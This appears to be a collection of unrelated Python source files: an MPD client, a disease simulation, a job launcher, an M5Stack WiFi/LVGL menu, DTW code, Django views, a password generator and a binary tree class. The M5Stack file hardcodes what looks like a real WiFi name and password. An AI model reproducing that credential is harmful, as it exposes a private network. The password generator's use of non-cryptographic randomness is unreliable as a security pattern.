+{"seq_id":"333220276","text":"#! /usr/bin/env python3\n\nfrom mpd import MPDClient, ConnectionError\nfrom mpd.base import CommandError\nimport threading\nimport queue\nimport time\nimport select\n\n\n\nclass mpd_jan:\n    def __init__(self, host, port):\n        self._host = host\n        self._port = port\n        self._watcher = MPDClient()\n        self._sender = MPDClient()\n        self._sender.watcher_player = self.player\n        self._sender.watcher_options = self.player\n        self._sender.watcher_playlist = self.get_playlist\n        self._sender.watcher_stored_playlist = self.stored_playlist\n        self._sender.watcher_update = self.watcher_update\n        self._sender.watcher_database = self.watcher_database\n        self._sender.watcher_sticker = self.watcher_sticker\n        self._sender.watcher_mixer = self.watcher_mixer\n        self.exit_sender, self.exit_watcher = False, False\n        self.queue_sender = queue.Queue()\n        self.queue_watcher = queue.Queue()\n        self.queue_output = queue.Queue()\n        self._playlist = []\n        self.sema_playlist = threading.Semaphore()\n        self._status = {}\n        self.sema_status = threading.Semaphore()\n        self._playlists = []\n        self.sema_playlists = threading.Semaphore()\n        self._library = []\n        self.sema_library = threading.Semaphore()\n\n    def cycle_watcher(self):\n        self._watcher.connect(self._host, self._port)\n        while threading.main_thread().is_alive() and not self.exit_watcher:\n            print('Watcher cycle round starts.')\n            try:\n                for i in self._watcher.idle():\n                    print(\"Watched message: \"+i)\n                    self.queue_sender.put_nowait(['watcher_'+i,\n                                                 [], {}])\n            except:\n                print('Watcher round experienced an error. 
Restart cycle.')\n print('Watcher cycle round ends.')\n try:\n self._watcher.disconnect()\n except:\n print('Watcher wouldn\\'t close, attempting to kill watcher.')\n # self._watcher.kill()\n print('Watcher disconnected.')\n \n def cycle_sender(self):\n while threading.main_thread().is_alive() and not self.exit_sender:\n print('Sender cycle round starts.')\n function, args, kwargs = self.queue_sender.get()\n print(function)\n for i in range(2):\n try:\n print('Command is being send to mpd')\n out = getattr(self._sender, function)(*args, **kwargs)\n # print('Got from sending: ')\n # print(out)\n if function == 'lsinfo': \n self.queue_output.put(out)\n break\n except ConnectionError as e:\n print('Error during sender cycle: {0}'.format(e))\n print('Reconnecting...')\n self._sender.connect(self._host, self._port)\n print('Reconnection sucessful.')\n except BrokenPipeError as e:\n print('Error during sender cycle: {0}'.format(e))\n print('Setting up a new sender...')\n self._sender = MPDClient()\n self._sender.watcher_player = self.player\n self._sender.watcher_options = self.player\n self._sender.watcher_playlist = self.get_playlist\n self._sender.watcher_stored_playlist = self.stored_playlist\n self._sender.watcher_update = self.watcher_update\n self._sender.watcher_database = self.watcher_database\n self._sender.watcher_sticker = self.watcher_sticker\n self._sender.watcher_mixer = self.watcher_mixer\n self._sender.connect(self._host, self._port)\n print('New sender set up.')\n except CommandError as e:\n print('Command Error: {0}'.format(e))\n self.queue_sender.task_done()\n print('Sender cycle round ends.')\n try:\n self._sender.disconnect()\n except:\n print('Sender wouldn\\'t close, attempting to kill sender.')\n # self._sender.kill()\n print('Sender disconnected.')\n\n play = lambda self, number_song=-1: self.queue_sender.put(['play',\n [number_song], {}])\n pause = lambda self: self.queue_sender.put(['pause', [], {}])\n stop = lambda self: self.queue_sender.put(['stop', [], {}])\n next = lambda self: self.queue_sender.put(['next', [], {}])\n previous = lambda self: self.queue_sender.put(['previous', [], {}])\n shuffle = lambda self: self.queue_sender.put(['shuffle', [], {}])\n clear = lambda self: self.queue_sender.put(['clear', [], {}])\n random = lambda self, state: self.queue_sender.put(['random', [state], {}])\n load = lambda self, name_playlist: self.queue_sender.put(['load',\n [name_playlist], {}])\n rm = lambda self, name_playlist: self.queue_sender.put(['rm', [name_playlist], {}])\n add = lambda self, filename: self.queue_sender.put(['add', [filename], {}])\n move = lambda self, songs, destination: self.queue_sender.put(['move',\n [songs, destination], {}])\n update = lambda self: self.queue_sender.put(['update', [], {}])\n save = lambda self, playlistname: self.queue_sender.put(['save', [playlistname], {}])\n\n def delete(self, selected_songs):\n print('Deleting songs')\n print(selected_songs)\n for i in selected_songs:\n self.queue_sender.put(['delete', [i], {}])\n \n # = lambda self: self.queue_sender.put(['', [], {}])\n def toggle(self):\n if self.status['state'] != 'play':\n self.play()\n else:\n self.pause()\n \n def player(self):\n self.status = self._sender.status()\n self.broadcast_status() \n \n def get_playlist(self):\n self.playlist = ['{0} - {1}'.format(i['artist'], i['title']) if 'artist' in i and 'title' in i else\n str(i['file']) for i in self._sender.playlistinfo()]\n print(\"broadcasting playlist\")\n self.broadcast_playlist()\n print(\"Broadcasting 
status\")\n self.broadcast_status()\n\n def stored_playlist(self):\n self.playlists = [i['playlist'] for i in self._sender.listplaylists()]\n self.broadcast_playlists()\n\n def watcher_update(self): \n full_info = self._sender.listall()\n path_and_title_files = {i.get('directory'):[[],[]] for i in full_info if i.get('directory')}\n path_and_title_files['/'] = [[],[]]\n for i in full_info:\n entry = i.get('directory')\n if entry:\n path, sep, filename = entry.rpartition('/')\n if path:\n path_and_title_files[path][0].append(filename)\n else:\n path_and_title_files['/'][0].append(filename)\n entry = i.get('file')\n if entry:\n path, sep, filename = entry.rpartition('/')\n if path: \n path_and_title_files[path][1].append(filename)\n else:\n path_and_title_files['/'][1].append(filename)\n self.library = path_and_title_files\n # self.broadcast_library()\n \n def watcher_database(self):\n pass\n \n def watcher_sticker(self):\n pass\n \n def watcher_mixer(self):\n pass\n \n def ls(self, folder=''):\n self.queue_sender.put(['lsinfo', [folder], {}])\n files = []\n directories = []\n for i in self.queue_output.get():\n if 'directory' in i:\n directories.append(i['directory'])\n elif 'file' in i:\n files.append(i['file'])\n return [directories, files]\n\n def broadcast_status(self):\n print('Broadcasting status:')\n print(self.status) \n print('Broadcasting ends.')\n \n def broadcast_playlist(self):\n print('Broadcasting playlist:')\n print(self.playlist)\n print('Broadcasting playlist.')\n \n def broadcast_playlists(self):\n print('Broadcasting playlist:')\n print(self.playlists)\n print('Broadcasting playlist.')\n\n def broadcast_library(self):\n print('Broadcasting library:')\n print(self.library)\n print('Broadcasting library.')\n\n def disconnect(self):\n print('Attempting to disconnect.')\n state_random = bool(int(self.status['random']))\n self.exit_watcher = True\n print(\"sending random\")\n self.random(int(not state_random))\n time.sleep(1)\n self.exit_sender = True\n self.random(int(state_random))\n print('Disconnection successful.')\n\n def connect(self):\n print('Reconnecting...')\n self.exit_watcher = False\n self.exit_sender = False\n self._sender.connect(self._host, self._port)\n self.status = self._sender.status()\n self.playlist = ['{0} - {1}'.format(i['artist'], i['title']) if 'artist' in i \n and 'title' in i else str(i['file']) for i in \n self._sender.playlistinfo()]\n self.playlists = [i['playlist'] for i in self._sender.listplaylists()]\n self.watcher_update()\n thread_watcher = threading.Thread(target=self.cycle_watcher)\n thread_watcher.start()\n thread_sender = threading.Thread(target=self.cycle_sender)\n thread_sender.start()\n print('Reconnected.')\n\n @property\n def playlist(self):\n with self.sema_playlist:\n buf = self._playlist\n return buf\n\n @playlist.setter\n def playlist(self, value):\n with self.sema_playlist:\n self._playlist = value\n return\n\n @property\n def status(self):\n with self.sema_status:\n buf = self._status.copy()\n return buf\n\n @status.setter\n def status(self, value):\n with self.sema_status:\n self._status = value\n return\n\n @property\n def playlists(self):\n with self.sema_playlists:\n buf = self._playlists.copy()\n return buf\n\n @playlists.setter\n def playlists(self, value):\n with self.sema_playlists:\n self._playlists = value\n return\n \n @property\n def library(self):\n with self.sema_library:\n buf = self._library.copy()\n return buf\n\n @library.setter\n def library(self, value):\n with self.sema_library:\n self._library = value\n 
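# the with-block exit releases sema_library; the bare return mirrors the other property setters\n            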
return\n\n\nif __name__ == \"__main__\":\n client = mpd_jan('localhost', 6600)\n client.connect()\n \n print(client.ls('David Guetta'))\n print('Thats it')\n time.sleep(5)\n\n client.disconnect()\n","sub_path":"mpd_jan.py","file_name":"mpd_jan.py","file_ext":"py","file_size_in_byte":10774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"115348651","text":"import pygame\nimport sys\nimport time\nimport random\n\nimport pygame.locals as pgl\n\nimport numpy as np\n\nimport networkx as nx\nimport epydemic\n\nfrom custom_disease_model import Kennels, DistemperModel\nfrom aggregate_visualization import AggregatePlot\n\nfrom copy import copy, deepcopy\n\nfrom threading import Thread\n\nimport logging\n\nimport multiprocessing\nfrom multiprocessing import Pool\n\nimport tqdm\n\nimport pandas as pd\nimport seaborn as sns\n\nimport matplotlib.pyplot as plt\n\nfrom matplotlib import cm\n\nfrom interventions import SortIntervention\n\nclass Simulation(object):\n \n def __init__(self, params, spatial_visualization=True, aggregate_visualization=True, return_on_equillibrium=False):\n self.return_on_equillibrium = return_on_equillibrium\n self.spatial_visualization = spatial_visualization\n self.aggregate_visualization = aggregate_visualization\n\n if not self.spatial_visualization and not self.aggregate_visualization and not self.return_on_equillibrium:\n logging.warning('Warning: No visualizations were set, it is highly recommended you set return_on_equillibrium to True otherwise you will have to manually manage the simulation state.')\n\n self.params = params\n if 'infection_kernel_function' in self.params and type(self.params['infection_kernel_function']) == str:\n self.params['infection_kernel_function'] = eval(self.params['infection_kernel_function'])\n else:\n self.params['infection_kernel_function'] = lambda node, k: 0.0\n if 'intervention' in self.params and type(self.params['intervention']) == str:\n self.params['intervention'] = eval(self.params['intervention'])\n else:\n self.params['intervention'] = None\n self.kennels = Kennels()\n self.disease = DistemperModel(self.kennels.get_graph(), self.params)\n\n self.update_hooks = []\n\n if spatial_visualization:\n self.FPS = 0\n self.SCREEN_WIDTH, self.SCREEN_HEIGHT = 640, 480\n pygame.init()\n self.fpsClock = pygame.time.Clock()\n self.screen = pygame.display.set_mode((self.SCREEN_WIDTH, self.SCREEN_HEIGHT), 0, 32)\n self.surface = pygame.Surface(self.screen.get_size())\n self.surface = self.surface.convert()\n self.surface.fill((255,255,255))\n self.clock = pygame.time.Clock()\n\n pygame.key.set_repeat(1, 40)\n \n self.screen.blit(self.surface, (0,0))\n\n self.font = pygame.font.Font(None, 36)\n \n if aggregate_visualization:\n self.plt = AggregatePlot(self.disease, self.kennels)\n self.update_hooks.append(self.plt.update)\n\n def check_events(self):\n for event in pygame.event.get():\n if event.type == pgl.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pgl.KEYDOWN:\n if event.key == pgl.K_ESCAPE:\n pygame.quit()\n sys.exit()\n\n def redraw(self):\n self.screen.blit(self.surface, (0,0))\n pygame.display.flip()\n pygame.display.update()\n self.fpsClock.tick(self.FPS)\n\n def draw_ui(self):\n text = self.font.render('{0} days, {1} hours'.format(int(np.floor(self.disease.t/24.0)), self.disease.t%24), 1, (10, 10, 10))\n textpos = text.get_rect()\n textpos.centerx = 200\n self.surface.blit(text, textpos)\n\n def get_disease_state(self):\n return {sc: 
len(self.disease.get_state_node(sc)['members']) for sc in self.disease.id_map.keys()}\n    \n    def update(self):\n        if self.spatial_visualization:\n            self.check_events()\n            self.surface.fill((255,255,255))\n\n        if not self.disease.in_equilibrium():\n            if 'intervention' in self.params and self.params['intervention'] != None:\n                self.params['intervention'].update(simulation=self)\n            self.disease.update(self.kennels)\n        elif self.return_on_equillibrium:\n            self.running = False\n            return\n\n        for hook in self.update_hooks:\n            hook()\n        \n        if self.spatial_visualization:\n            self.kennels.draw(self.surface, self.disease)\n            self.draw_ui()\n            self.redraw()\n    \n    def stop(self):\n        self.running = False\n\n    def run(self, asynchronous=False):\n        self.running = True\n        if asynchronous:\n            self.async_thread = Thread(target=self.run, args=(False,))\n            self.async_thread.start()\n        else:\n            while self.running:\n                self.update()\n            return self.get_disease_state()\n\nclass BatchSimulation(object):\n    def __init__(self, params, runs, pool_size=-1):\n        self.params = params\n        self.runs = runs\n        if pool_size == None:\n            self.pool_size = 1\n        elif pool_size <= 0:\n            self.pool_size = multiprocessing.cpu_count()\n        else:\n            # an explicit positive pool size was requested\n            self.pool_size = pool_size\n    \n    def run(self):\n        results = []\n        with Pool(self.pool_size) as p:\n            for i in tqdm.tqdm(p.imap_unordered(BatchSimulation.run_simulation, [deepcopy(self.params) for _ in range(0, self.runs)]), total=self.runs):\n                results.append(i)\n            p.close()\n            p.join()\n        return results\n    \n    @staticmethod\n    def run_simulation(params):\n        return Simulation(params, spatial_visualization=False, aggregate_visualization=False, return_on_equillibrium=True).run()\n\ndef main(batch=False):\n    params = {\n        'pIntake': 0.25,\n        'pInfect': 0.04,\n        'pSurvive': 0.0025,\n        'pDie': 0.0058333333333333,\n        'pDieAlternate': 0.0,\n        'refractoryPeriod': 3.0*24.0,\n        'infection_kernel': [0.5, 0.25],\n        'infection_kernel_function': 'lambda node, k: k*(1-node[\\'occupant\\'][\\'immunity\\'])',\n        'immunity_growth_factors': [1.03, 0.001], # _[0]*immunity+_[1]\n        'intervention': 'SortIntervention()'\n    }\n    if not batch:\n        sim = Simulation(params, spatial_visualization=True, return_on_equillibrium=False, aggregate_visualization=True)\n        print(sim.run())\n    else:\n        runs = 32\n        bar_width = 0.35\n        proportion = True\n        colors = [cm.jet(0), cm.jet(0.5)]\n        alphas = [0.5, 0.25]\n        labels = ['Sort Intervention', 'No Intervention']\n        \n        params1 = copy(params)\n        params1['intervention'] = None\n        \n        results = BatchSimulation(params, runs).run()\n\n        total = sum(list(results[0].values()))\n        df = pd.DataFrame.from_records(results)\n        if proportion:\n            df /= total\n        \n        plt.rcdefaults()\n\n        objects = df.columns\n        y_pos = np.arange(len(objects))\n        \n        plt.bar(y_pos-bar_width/2, df.mean(), bar_width, align='center', alpha=alphas[0], yerr=df.std()/np.sqrt(len(df)), color=colors[0], label=labels[0])\n        \n        results = BatchSimulation(params1, runs).run()\n        df = pd.DataFrame.from_records(results)\n        if proportion:\n            df /= total\n        plt.bar(y_pos+bar_width/2, df.mean(), bar_width, align='center', alpha=alphas[1], yerr=df.std()/np.sqrt(len(df)), color=colors[1], label=labels[1])\n\n        plt.xticks(y_pos, objects)\n        plt.ylabel('Mean Animal Count')\n        plt.ylim(0, 1)\n        plt.title('Average Simulation Performance')\n        plt.legend()\n\n        plt.show()\n\n\nif __name__ == '__main__':\n    main(batch=True)\n    ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"568264939","text":"from multiprocessing import Pool\r\nimport os\r\n\r\ntargetFolder = 'GraphFusionModel'\r\ntargetScript = 'GraphFusionModelV14'\r\n\r\n# targetFolder = 'ARIMA'\r\n# targetScript = 'ARIMA-V1'\r\n\r\n# targetFolder = 'SingleGraph'\r\n# targetScript = 'SingleGraph-V1'\r\n\r\ndef slaveThread(fileNameString, argv):\r\n    os.system('python -m ' + fileNameString + ' ' + argv)\r\n\r\nstationRangeList = [\r\n    [0, 30]\r\n]\r\n\r\nif __name__ == '__main__':\r\n\r\n    n_jobs = 4\r\n    stationRange = stationRangeList[0]\r\n\r\n    k = stationRange[0]\r\n    while k <= stationRange[1]:\r\n        currentJobNumber = min(n_jobs, stationRange[1] - k + 1)\r\n        print('Total process', currentJobNumber)\r\n        p = Pool()\r\n        for i in range(currentJobNumber):\r\n            p.apply_async(slaveThread, args=(targetFolder + '.' + targetScript + '.py', targetScript + '_%s' % (i + k)), )\r\n        p.close()\r\n        p.join()\r\n        k += currentJobNumber","sub_path":"Chicago/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"593682658","text":"import machine\nimport gc\nimport network\nimport lvgl as lv\n#from m5_lvgl import ButtonsInputEncoder, EncoderInputDriver\n#from lvInputsC import Keyboard, KeyButton, M5ButtonEncoder, deviceDriver\n#from m5inputs.keypad import KeyButton, Keypad\n#from m5inputs.base import deviceDriver\nfrom m5inputs.m5encoder import M5ButtonEncoder, deviceDriver\n\nfrom ili9341 import ili9341\nimport gc\nimport utime\n\nimport micropython\nmicropython.alloc_emergency_exception_buf(100)\n\nfrom micropython import const\nfrom machine import Pin\n\nBUTTON_A_PIN = const(39)\nBUTTON_B_PIN = const(38)\nBUTTON_C_PIN = const(37)\n\n\nAUTHENTICATED = False\n\nOPTION1 = False\nOPTION2 = False\nOPTION3 = False\nOPTION4 = False\n\n\ndef connect():\n    \n    ssid = \"Maison-ORBI\"\n    password = \"08Franie@11Crabole=12Atrel\"\n    \n    station = network.WLAN(network.STA_IF)\n    \n    if station.isconnected() == True:\n        print(\"Already connected\")\n        return\n    \n    station.active(True)\n    station.connect(ssid, password)\n    \n    while station.isconnected() == False:\n        utime.sleep_ms(100)\n        print(\".\", end=\"\")\n    print(\"\")\n    \n    print(\"Connection successful\")\n    print(station.ifconfig())\n\ndisp = ili9341(miso=19, mosi=23, clk=18, cs=14, dc=27, rst=33, backlight=32,power=-1,power_on=-1, backlight_on=1,\n               mhz=40, factor=4, hybrid=True, width=320, height=240,\n               colormode=ili9341.COLOR_MODE_BGR, rot=ili9341.MADCTL_ML, invert=False, double_buffer=False\n               ) # Create a display driver\n\nconnect()\n\ndef event_handler(obj, event):\n    \"\"\"\n    Called when a button is released.\n    Parameters\n    ----------\n    btn :\n        The Button that triggered the event.\n    event :\n        The triggering event.\n    \"\"\"\n    global OPTION1, OPTION2, OPTION3, OPTION4\n    if event == lv.EVENT.RELEASED:\n        print(\"Clicked: %s\" % lv.list.get_btn_text(obj))\n        if lv.list.get_btn_text(obj) == \"Option1\":\n            \n            OPTION1 = True\n            \n        elif lv.list.get_btn_text(obj) == \"Option2\":\n            \n            OPTION2 = True\n\n        elif lv.list.get_btn_text(obj) == \"Option3\":\n\n            OPTION3 = True\n        \n        elif lv.list.get_btn_text(obj) == \"Option4\":\n            \n            OPTION4 = True\n\nscreen = lv.obj()\n\n# Keyboard/pad version\n# kbd = Keypad(debug= True)\n# kbdRead = kbd.getReader()\n# tA = KeyButton(BUTTON_A_PIN, keyboard = kbd, key = lv.KEY.LEFT, debug= True)\n# tB = KeyButton(BUTTON_B_PIN, keyboard = kbd, key = lv.KEY.ENTER, debug= True)\n# tC = KeyButton(BUTTON_C_PIN, keyboard = kbd, key = lv.KEY.RIGHT, debug= True)\n# driv = deviceDriver(kbd, lv.INDEV_TYPE.KEYPAD)\n\n# ButtonEncoder 
version\nenc = M5ButtonEncoder(debug = True)\n# driv = deviceDriver(enc, lv.INDEV_TYPE.ENCODER)\ndriv = enc.registerDriver()\n\n\nlist1 = lv.list(screen)\nAUTHENTICATED = True\nif AUTHENTICATED:\n list1.set_size(300, 154)\n list1.align(None, lv.ALIGN.CENTER, 0, -5) \n \n # Add buttons to the list\n\n list_btn = list1.add_btn(lv.SYMBOL.FILE, \"Option1\")\n list_btn.set_event_cb(event_handler)\n \n list_btn = list1.add_btn(lv.SYMBOL.DIRECTORY, \"Option2\")\n list_btn.set_event_cb(event_handler)\n \n list_btn = list1.add_btn(lv.SYMBOL.DIRECTORY, \"Option3\")\n list_btn.set_event_cb(event_handler) \nelse:\n list1.set_size(300, 100)\n list1.align(None, lv.ALIGN.CENTER, 0, -5) \n \n # Add buttons to the list\n list_btn = list1.add_btn(lv.SYMBOL.FILE, \"Option2\")\n list_btn.set_event_cb(event_handler)\n \n list_btn = list1.add_btn(lv.SYMBOL.DIRECTORY, \"Option3\")\n list_btn.set_event_cb(event_handler)\n \ngroup = lv.group_create()\nlv.group_add_obj(group, list1)\nenc.group = group\n\nlv.group_set_style_mod_cb(group, None)\nlv.group_set_style_mod_edit_cb(group,None)\nlv.group_set_editing(group, True)\n \nlv.scr_load(screen)\n\n","sub_path":"Examples/taMainD.py","file_name":"taMainD.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"47325752","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nclass dtw:\n def __init__(self, x, y):\n try:\n assert len(x.shape) == 1\n except AssertionError:\n assert x.shape[1] == 1\n print('please reset the input shape, make sure it meet the requirement of input')\n self.x = x\n self.y = y\n self.loss, self.loss_mat = self.main()\n\n def distance(self, x, y, is_sum = False):\n sample_distance = lambda x, y: np.abs(x - y)\n \n if is_sum:\n return np.sum(sample_distance(x, y))\n else:\n return sample_distance(x, y)\n\n def main(self):\n self.org_mat = np.zeros((self.x.shape[0], self.y.shape[0]))\n t1,t2 = self.org_mat.copy(),self.org_mat.copy()\n for i in range(self.x.shape[0]):\n for j in range(self.y.shape[0]):\n t1[i,j] = self.x[i]\n \n for j in range(self.y.shape[0]):\n for i in range(self.x.shape[0]):\n t2[i,j] = self.y[j]\n \n self.org_mat = self.distance(t1, t2)\n cost_mat = self.org_mat.copy()\n \n for i in range(self.org_mat.shape[0]):\n for j in range(self.org_mat.shape[1]):\n if i > 0 and j > 0:\n cost_mat[i,j] = cost_mat[i,j] + np.min([cost_mat[i - 1, j], cost_mat[i - 1,j - 1], cost_mat[i, j - 1]])\n elif i == 0 and j > 0:\n cost_mat[i,j] = cost_mat[i,j] + np.min([cost_mat[i, j - 1]])\n #print(np.min([cost_mat[i, j - 1]]))\n elif i > 0 and j == 0:\n cost_mat[i,j] = cost_mat[i,j] + np.min([cost_mat[i - 1, j]])\n \n return cost_mat[i,j], cost_mat\n \nif __name__ == \"__main__\":\n x = np.array([3,2,4,5,6,7,8,9,4,5,6,7,8,9,5,6,6])\n y = np.array([4,5,6,7,8,9,4,5,6,7,8,9,5,6,6])\n test = dtw(x,y)\n print(test.loss)\n print(test.loss_mat)\n print(test.org_mat)","sub_path":"dtw.py","file_name":"dtw.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"240396982","text":"from django.core.exceptions import PermissionDenied\nfrom django.http import Http404\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import ListView\nfrom rtdc.cbv import DecoratorMixin\nfrom rtdc.shortcuts import jsonResp\nfrom tokens.models import CollectorToken\nfrom records.models import Record\n\n\n@csrf_exempt\ndef 
add_record(request):\n    if request.method != \"POST\":\n        raise NotImplementedError\n\n    token = request.POST.get(\"token\", None)\n    data = request.POST.get(\"data\", None)\n\n    if not token:\n        raise PermissionDenied\n\n    if not data:\n        raise PermissionDenied\n\n    try:\n        data = float(data)\n    except ValueError:\n        raise PermissionDenied\n\n    try:\n        token = CollectorToken.objects.get(token=token)\n        r = Record(\n            data=data,\n            token=token,\n        )\n        r.save()\n        return jsonResp(r.to_dict())\n    except CollectorToken.DoesNotExist:\n        raise PermissionDenied\n\nclass RecordsListView(DecoratorMixin, ListView):\n    model = Record\n    template_name = 'records/list.jinja2'\n\n    def get_context_data(self, **kwargs):\n        context = super(RecordsListView, self).get_context_data(**kwargs)\n        try:\n            token = CollectorToken.objects.get(pk=self.kwargs['pk'])\n            context['token'] = token\n            return context\n        except CollectorToken.DoesNotExist:\n            raise Http404\n\n    def get_queryset(self):\n        return self.model.objects.filter(token__pk=self.kwargs['pk'])\n\n\ndef get_series(request, token_id):\n    try:\n        token = CollectorToken.objects.get(pk=token_id)\n        resp = []\n\n        serie = {\n            'name': token.name,\n            'data': [],\n            'type': \"area\",\n        }\n\n        for r in token.records.all().order_by(\"-date_added\"):\n            serie['data'].append(\n                [\n                    {\n                        'year': r.date_added.year,\n                        'month': r.date_added.month,\n                        'day': r.date_added.day,\n                        'hours': r.date_added.hour,\n                        'minutes': r.date_added.minute,\n                        'seconds': r.date_added.second,\n                        'ms': r.date_added.microsecond,\n                    },\n                    r.data\n                ]\n            )\n\n        resp.append(serie)\n        return jsonResp(resp)\n\n    except CollectorToken.DoesNotExist:\n        raise PermissionDenied\n\n\n\n","sub_path":"records/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"312630759","text":"import random\n\ndef genbyte():\n    # keep drawing random 8-bit strings until one decodes to a printable\n    # ASCII code (33-125) that is neither '^' (94) nor '`' (96); re-checking\n    # every rule on each draw avoids the chained-while pattern, where a\n    # regenerated byte could slip back into an earlier forbidden range\n    while True:\n        temp = \"\"\n        for y in range(8):\n            i = round(random.random())\n            temp = temp + str(i)\n        value = int(temp, 2)\n        if 32 < value < 126 and value not in (94, 96):\n            return temp\n\ndef genpwd(bitL):\n    pwd = \"\"\n    byteL = int(bitL / 8)\n    for x in range(byteL):\n        pwd = pwd + chr(int(genbyte(), 2))\n    return pwd\n","sub_path":"Test Files/PasswordGenerator.py","file_name":"PasswordGenerator.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"452369632","text":"from chapterEight.DanielBaseTree import DanielTree\nfrom abc import abstractmethod\nfrom queue import Queue\nfrom chapterSeven.linkedListQueue import LinkedListQueue\nclass DanielBinary(DanielTree):\n    \"\"\"\n    ADT for the binary tree specialization, supports three additional accessor methods from the inherited\n    DanielTree class\n    1) left(p) -> return the position that represents the left child of position p or None\n    2) right(p) -> return the position that represents the right child of position p or None\n    3) sibling(p) -> return the position that represents the sibling of p or None if p has no sibling\n    \"\"\"\n\n\n    @abstractmethod\n    def left(self, p):\n        \"\"\"\n        Time complexity O(1) -> each node class instance will maintain an instance var to its child\n        return a position representing P's left child or None\n        :param p:\n        :return:\n        \"\"\"\n    @abstractmethod\n    def right(self, p):\n        \"\"\"\n        Time complexity O(1) -> each node class instance will maintain an 
instance var to its child\n return a position representing P's right child or None\n :param p:\n :return:\n \"\"\"\n\n # -------------------- concrete methods implemented in this class -------------------- #\n\n def sibling(self, p) -> object:\n \"\"\"\n Time complexity O(1) -> each node will maintain a reference to it's parent, which as pointers to its children\n return a a position representing p's sibling or None if there is none\n :param p:\n :return:\n \"\"\"\n\n parent = self.parent(p)\n if parent is None:\n return None\n if p == self.right(parent):\n return self.left(parent)\n else:\n return self.right(parent)\n\n def children(self, p):\n \"\"\"\n Time complexity O(1) -> each node class instance will maintain references it's children, generator yields\n time complexity times # of children, for binary tree this is constant time\n generate an iteration of Positions representing P's children\n :param p:\n :return:\n \"\"\"\n if self.left(p) is not None:\n yield self.left(p)\n if self.right(p) is not None:\n yield self.right(p)\n\n def inorder(self):\n \"\"\"\n returns an iterator of all the elements within a tree using an inorder BFS. binary tree specific as it\n requires there to be only two children per position max\n :return:\n \"\"\"\n if not self.is_empty():\n for y in self._subtree_inorder(self.root()):\n yield y\n\n def _subtree_inorder(self, p):\n \"\"\"\n returns\n :param p:\n :return:\n \"\"\"\n if self.left(p) is not None:\n for other in self._subtree_inorder(self.left(p)):\n yield other\n yield p\n if self.right(p) is not None:\n for other in self._subtree_inorder(self.right(p)):\n yield other\n\n def bredthfirst(self):\n \"\"\"\n O(N) must visit all nodes\n generate a bredth-first iteration of the positions in a tree\n Looks at all elements at depth(p) before proceeding to next layer\n\n :return:\n \"\"\"\n if not self.is_empty():\n # create instance of a linked queue class to hold elements in traversal order\n fringe = LinkedListQueue()\n fringe.enqueue(self.root())\n # add the root\n while not fringe.is_empty():\n # while there are still elements to traverse, get an elmenet\n p = fringe.dequeue()\n # yield element for the iterator\n yield p\n # if the element has children, add those to the back of the queue, to be processed after all\n # elements at current depth(P) are done processing\n for c in self.children(p):\n fringe.enqueue(c)\n\n def positions(self):\n \"\"\"\n Runtime: O(N) must visit all nodes\n overriden from the ADT tree using the in order traversal implementation specific to binary trees\n :return:\n \"\"\"\n return self.inorder()\n\n def parenthesize(self, p):\n \"\"\"\n print a parenthetic representation of a tree\n :param p:\n :return:\n \"\"\"\n print(p.element())\n if not self.is_leaf(p):\n first_time = True\n for c in self.children(p):\n sep = ' (' if first_time else ', '\n print(sep, end=\"\")\n first_time = False\n self.parenthesize(c)\n print(')', end=\"\")\n","sub_path":"chapterEight/BinaryTreeADT.py","file_name":"BinaryTreeADT.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"59451705","text":"from numpy import pi\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\nV0 = int(input(\"Podaj prędkość początkową: \"))\na = int(input(\"Podaj kąt rzutu (w stopniach): \"))\n\n\ng=9.8\n\nMAX_HEIGHT = (V0*V0*math.sin(a*pi/180)*math.sin(a*pi/180))/(2*g)\n#ZASIEG = (2*V0*V0*math.sin(a*pi/180)*math.cos(a*pi/180))/g\nZASIEG2 = 
